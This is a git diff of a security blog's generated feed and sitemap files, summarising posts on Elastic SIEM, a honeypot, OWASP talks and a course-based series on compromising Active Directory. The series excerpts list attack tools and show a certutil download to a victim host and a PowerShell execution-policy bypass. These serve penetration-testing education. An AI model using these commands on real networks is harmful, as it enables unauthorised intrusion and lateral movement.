https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ + Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases Mitm6: https://github.com/fox-it/mitm6 Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 Mimikatz: https://github.com/gentilkiwi/mimikatz PRET: https://github.com/RUB-NDS/PRET Praeda: https://github.com/percx/Praeda SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ - Compromising AD - Part 4: Post Exploitation https://auti.dev/compromising-ad-part-4-post-exploitation/ Tue, 17 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-4-post-exploitation/ - Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil -certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host -python -m SimpleHTTPServer [port] Browser -Navigate directly to the file (%20 for spaces) FTP -On Attacker Machine -python -m pyftpdlib 21 On Victim Machine, Browse to + Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host python -m SimpleHTTPServer [port] Browser Navigate directly to the file (%20 for spaces) FTP On Attacker Machine python -m pyftpdlib 21 On Victim Machine, Browse to - Compromising AD - Part 3: Post Compromise Attacks https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Mon, 16 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks! - Compromising AD - Part 2: Post Compromise Enumeration https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Sun, 15 Aug 2021 12:37:53 +0530 - https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ - Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Enumeration Load up a command prompt and cd into Downloads -powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView -. .\Powerview.ps1 Fundamental Commands -Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). + Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Enumeration Load up a command prompt and cd into Downloads powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView . .\Powerview.ps1 Fundamental Commands Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). - Compromising AD - Part 1: Initial Attack Vectors https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Sun, 15 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ - Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. -Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. + Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. - diff --git a/public/index.xml b/public/index.xml index 6b44df0..3495679 100644 --- a/public/index.xml +++ b/public/index.xml @@ -4,121 +4,73 @@ auti.dev   ≽^._.^≼ ∫ https://auti.dev/ Recent content on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Demystifying Elastic SIEM https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. - Leveraging Cybersecurity using ElasticSearch https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ - First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com -This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. + First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. - HoneyTrack https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 - https://auti.dev/honeytrack/ - Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. -HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. + Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. - OWASP Top 10 https://auti.dev/owasp-top-10/ Wed, 15 Feb 2023 12:22:44 +0530 - https://auti.dev/owasp-top-10/ - First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com -I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. + First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. - Useful AD Resources https://auti.dev/useful-ad-resources/ Fri, 20 Aug 2021 12:35:53 +0530 - https://auti.dev/useful-ad-resources/ - Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases -Mitm6: https://github.com/fox-it/mitm6 -Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 -Mimikatz: https://github.com/gentilkiwi/mimikatz -PRET: https://github.com/RUB-NDS/PRET -Praeda: https://github.com/percx/Praeda -SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) -LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) -cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 -calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 -Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa -Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ -mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ -Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ -Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet -A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ -Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html -GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ + Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases Mitm6: https://github.com/fox-it/mitm6 Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 Mimikatz: https://github.com/gentilkiwi/mimikatz PRET: https://github.com/RUB-NDS/PRET Praeda: https://github.com/percx/Praeda SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ - Compromising AD - Part 4: Post Exploitation https://auti.dev/compromising-ad-part-4-post-exploitation/ Tue, 17 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-4-post-exploitation/ - Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil -certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host -python -m SimpleHTTPServer [port] Browser -Navigate directly to the file (%20 for spaces) FTP -On Attacker Machine -python -m pyftpdlib 21 On Victim Machine, Browse to + Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host python -m SimpleHTTPServer [port] Browser Navigate directly to the file (%20 for spaces) FTP On Attacker Machine python -m pyftpdlib 21 On Victim Machine, Browse to - Compromising AD - Part 3: Post Compromise Attacks https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Mon, 16 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks! - Compromising AD - Part 2: Post Compromise Enumeration https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Sun, 15 Aug 2021 12:37:53 +0530 - https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ - Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView -Enumeration Load up a command prompt and cd into Downloads -powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView -. .\Powerview.ps1 Fundamental Commands -Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). + Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Enumeration Load up a command prompt and cd into Downloads powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView . .\Powerview.ps1 Fundamental Commands Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). - Compromising AD - Part 1: Initial Attack Vectors https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Sun, 15 Aug 2021 12:35:53 +0530 - https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ - Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. -Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. + Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense. - diff --git a/public/project/index.xml b/public/project/index.xml index c4cc342..8a9a555 100644 --- a/public/project/index.xml +++ b/public/project/index.xml @@ -4,19 +4,17 @@ Projects on auti.dev   ≽^._.^≼ ∫ https://auti.dev/project/ Recent content in Projects on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Hugo en-US Copyright © 2023, Atharva Auti. - Sat, 19 Aug 2023 14:28:54 +0530 + Sat, 19 Aug 2023 14:28:54 +0530 + HoneyTrack https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 - https://auti.dev/honeytrack/ - Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. -HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. + Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. - diff --git a/public/robots.txt b/public/robots.txt index f873529..4f9540b 100644 --- a/public/robots.txt +++ b/public/robots.txt @@ -1,2 +1 @@ -User-Agent: * -Sitemap: https://auti.dev/sitemap.xml +User-agent: * \ No newline at end of file diff --git a/public/sitemap.xml b/public/sitemap.xml index 16ca954..3e3b664 100644 --- a/public/sitemap.xml +++ b/public/sitemap.xml @@ -4,7 +4,6 @@ https://auti.dev/ 2023-10-17T12:35:53+05:30 - 0 https://auti.dev/blog/ 2023-10-17T12:35:53+05:30 diff --git a/public/talk/index.xml b/public/talk/index.xml index ebd1964..10ba212 100644 --- a/public/talk/index.xml +++ b/public/talk/index.xml @@ -4,29 +4,24 @@ Talks on auti.dev   ≽^._.^≼ ∫ https://auti.dev/talk/ Recent content in Talks on auti.dev   ≽^._.^≼ ∫ - Hugo -- gohugo.io + Hugo en-US Copyright © 2023, Atharva Auti. - Tue, 17 Oct 2023 12:35:53 +0530 + Tue, 17 Oct 2023 12:35:53 +0530 + Leveraging Cybersecurity using ElasticSearch https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 - https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ - First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com -This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. + First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. - OWASP Top 10 https://auti.dev/owasp-top-10/ Wed, 15 Feb 2023 12:22:44 +0530 - https://auti.dev/owasp-top-10/ - First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com -I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. + First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. -